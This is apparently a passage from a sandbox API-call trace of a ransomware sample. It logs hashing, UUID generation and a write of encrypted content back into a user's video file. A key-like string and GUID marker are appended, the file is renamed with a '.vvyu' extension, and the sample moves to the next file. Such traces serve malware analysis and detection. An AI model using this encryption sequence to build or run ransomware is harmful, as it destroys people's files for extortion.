CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.793] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.793] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.794] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.794] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.794] GetLastError () returned 0x0 [0195.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.794] GetLastError () returned 0x0 [0195.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.794] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.795] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.795] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.795] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.795] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf970) returned 0x2af5168 [0195.796] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f48 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f90 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae64e8 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.800] GetCurrentThreadId () returned 0x5d8 [0195.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae86e8 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.801] GetCurrentThreadId () returned 0x5d8 [0195.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9f90 | out: hHeap=0x2c0000) returned 1 [0195.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.815] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xf96f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xf96f, lpOverlapped=0x0) returned 1 [0195.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.816] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf974, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.816] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.818] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.822] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.822] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.822] CloseHandle (hObject=0x584) returned 1 [0195.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.827] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\HI5Yoaj9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\hi5yoaj9.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\HI5Yoaj9.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\hi5yoaj9.mp4.vvyu")) returned 1 [0195.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.829] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.831] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744d5480, ftCreationTime.dwHighDateTime=0x1d899cd, ftLastAccessTime.dwLowDateTime=0x8d2ac3f0, ftLastAccessTime.dwHighDateTime=0x1d89df8, ftLastWriteTime.dwLowDateTime=0x8d2ac3f0, ftLastWriteTime.dwHighDateTime=0x1d89df8, nFileSizeHigh=0x0, nFileSizeLow=0xb6b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ippAwK.flv", cAlternateFileName="")) returned 1 [0195.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.831] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ippAwK.flv") returned=".flv" [0195.831] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ippAwK.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ippawk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.832] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=46774) returned 1 [0195.832] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.835] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.835] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.838] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 